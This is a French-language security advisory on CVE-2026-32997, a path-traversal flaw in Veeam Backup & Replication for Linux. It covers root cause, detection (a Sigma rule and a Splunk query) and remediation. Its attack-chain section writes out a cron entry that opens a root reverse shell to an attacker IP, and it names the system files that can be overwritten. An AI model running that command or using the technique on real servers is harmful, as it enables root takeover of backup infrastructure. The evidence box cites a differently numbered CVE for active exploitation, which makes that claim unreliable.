CVE-2026-32997 : écriture de fichiers arbitraires dans Veeam Backup & Replication pour Linux
HERMES THREAT SCORE & RISQUE INFRASTRUCTURE LINUX
Cible :Service de déploiement et transport Veeam Backup & Replication (Hôtes Linux) Hermes classe la CVE-2026-32997 à un niveau de criticité élevé (HTS 88). Bien que l'exploitation requière le rôle d'administrateur de sauvegarde au sein de la console VBR, elle neutralise le modèle de confinement du système d'exploitation sous-jacent. Sur les serveurs de gestion et dépôts renforcés sous Linux, un administrateur d'application compromis peut écraser des fichiers critiques du système d'exploitation pour acquérir les privilèges root complets, rendant caduques les mécanismes d'immutabilité matérielle.
CVE-2026-32997: Arbitrary File Write in Linux-based Veeam Backup & ReplicationVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Métadonnées et surface d’attaque
Section intitulée « 1. Métadonnées et surface d’attaque »| Paramètre | Spécification technique | Impact opérationnel |
|---|---|---|
| Identifiant CVE | CVE-2026-32997 | Identifiant standardisé NVD / MITRE |
| Éditeur / logiciel | Veeam Software / Backup & Replication | Plan de sauvegarde et reprise d’activité |
| Système hôte affecté | Linux (Ubuntu, Debian, RHEL, Rocky Linux, SLES) | Serveurs VBR et passerelles de transport |
| Versions affectées | VBR 13.x antérieures à 13.0.2 | Installations Linux natives |
| Version corrigée | Veeam Backup & Replication 13.0.2 | Correctif officiel recommandé |
| CWE associée | CWE-36 : Absolute Path Traversal | Défaut de cloisonnement du système de fichiers |
| Privilèges initiaux | Backup Administrator (authentifié) | Console VBR ou API REST/gRPC |
| Privilèges finaux | root (superutilisateur local) | Contrôle total du système hôte et des dépôts |
2. Analyse technique de la cause racine
Section intitulée « 2. Analyse technique de la cause racine »La faille découle d’un traitement déficient des chemins de destination au sein de l’utilitaire de déploiement et de synchronisation des modules Linux (veeamsvc / VeeamDeploymentService).
Schéma d'exploitation de la CVE-2026-32997 sur serveur VBR Linux :
┌────────────────────────────────────────────────────────┐ │ Administrateur de sauvegarde compromis │ └───────────────────────────┬────────────────────────────┘ │ Requête API DeploymentService │ Payload : filePath = "/etc/cron.d/backdoor" ▼ ┌────────────────────────────────────────────────────────┐ │ Service Veeam sous Linux (Exécuté avec privilèges root)│ │ 1. Réception du flux binaire et du métatag de chemin │ │ 2. Omission de Path.GetFileName() ou chroot jail │ │ 3. Écriture directe : File.WriteAllBytes(filePath) │ └───────────────────────────┬────────────────────────────┘ │ Écriture arbitraire dans /etc/cron.d/ ▼ ┌────────────────────────────────────────────────────────┐ │ Démon cron système Linux │ │ • Exécution de la tâche planifiée sous UID 0 (root) │ │ • Rétro-connexion vers le C2 / Reverse Shell root │ └────────────────────────────────────────────────────────┘Mécanisme de la traversée absolue
Section intitulée « Mécanisme de la traversée absolue »Lorsque la console initie le téléversement d’un composant auxiliaire (par exemple, un script de vérification de consistance ou un module de transport de données), le service Linux reçoit deux éléments :
- Les métadonnées du fichier, comprenant son nom et son chemin de destination théorique.
- Le flux binaire représentant le contenu du fichier.
Dans les versions antérieures à la 13.0.2, le code C# exécuté sous l’environnement d’exécution .NET Linux ne vérifiait pas si le chemin spécifié s’échappait du répertoire de travail prévu (/opt/veeam/transport/ ou /tmp/veeam/). L’absence de vérification canonique permettait de fournir un chemin absolu direct (/etc/cron.d/cron_task, /etc/ld.so.preload ou /root/.ssh/authorized_keys). Comme le démon de déploiement Veeam opère avec les privilèges root pour configurer le stockage et les interfaces réseau, l’écriture est effectuée sans aucune restriction de permissions.
3. Chaîne d’attaque et élévation de privilèges
Section intitulée « 3. Chaîne d’attaque et élévation de privilèges »Un opérateur malveillant ou un groupe de ransomware (tel qu’Akira ou LockBit) ayant préalablement compromis un poste de travail d’administration de sauvegarde peut exploiter cette vulnérabilité en 3 étapes :
- Élaboration du fichier de persistance root :
L’attaquant prépare un fichier de tâche cron au format standard Linux :
Fenêtre de terminal * * * * * root /bin/bash -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" - Invocation du service de déploiement :
À l’aide d’un script Python exploitant les points de terminaison d’administration de VBR, l’attaquant soumet le fichier binaire en indiquant la destination
/etc/cron.d/veeam_maintenance. - Exécution du payload : Dans la minute qui suit, le démon cron local interprète la tâche et instancie un shell interactif root connecté au serveur d’écoute de l’attaquant.
4. Stratégie de détection et règles Sigma
Section intitulée « 4. Stratégie de détection et règles Sigma »Règle Sigma : création suspecte de fichiers par le processus Veeam sous Linux
Section intitulée « Règle Sigma : création suspecte de fichiers par le processus Veeam sous Linux »title: Écriture de fichier système critique par un processus Veeam Linuxid: cve-2026-32997-veeam-file-writestatus: experimentaldescription: Détecte la création de fichiers en dehors des répertoires standards Veeam par veeamsvc sous Linuxreferences: - https://www.veeam.com/knowledge-base.htmllogsource: category: file_event product: linuxdetection: selection_process: Image|endswith: - '/veeamsvc' - '/VeeamDeploymentService' selection_target: TargetFilename|startswith: - '/etc/' - '/root/' - '/usr/bin/' - '/usr/sbin/' - '/var/spool/cron/' filter_legit: TargetFilename|startswith: - '/etc/veeam/' - '/opt/veeam/' - '/tmp/veeam/' condition: selection_process and selection_target and not filter_legitfalsepositives: - Scripts de mise à jour manuelle officiels exécutés hors package managerlevel: criticalRequête de Threat Hunting (auditd / Splunk)
Section intitulée « Requête de Threat Hunting (auditd / Splunk) »index=linux_audit (type="SYSCALL" OR type="PATH")(comm="veeamsvc" OR comm="VeeamDeployment")(name="/etc/cron*" OR name="/etc/ld.so*" OR name="/root/.ssh/*" OR name="/etc/sudoers*")| table _time host comm auid uid name success5. Mesures de remédiation et durcissement
Section intitulée « 5. Mesures de remédiation et durcissement »- Mise à niveau immédiate : Appliquer sans délai la mise à jour Veeam Backup & Replication 13.0.2 sur tous les serveurs de gestion et serveurs mandataires Linux.
- Cloisonnement des rôles administratifs : Restreindre l’attribution du rôle Backup Administrator uniquement aux opérateurs d’infrastructure dûment habilités. Utiliser des comptes nominatifs distincts des comptes bureautiques.
- Durcissement du système hôte Linux :
Activer AppArmor ou SELinux en mode Enforcing afin d’interdire aux démons applicatifs Veeam l’écriture dans
/etc/cron*et dans les répertoires personnels des administrateurs système. - Surveillance de l’intégrité des fichiers (FIM) :
Déployer un agent d’audit (ex. OSQuery, auditd ou Wazuh) surveillant en temps réel toute création ou altération de fichiers dans
/etc/cron.d/et/etc/systemd/system/.
6. Références et sources techniques
Section intitulée « 6. Références et sources techniques »- Avis officiel Veeam Software : Veeam Security Advisory CVE-2026-32997
- Base NVD NIST : CVE-2026-32997 Detail
- Dossier connexe Hermes : investigation des attaques par ransomware contre Veeam
- Établi interactif : banc d’essai software intelligence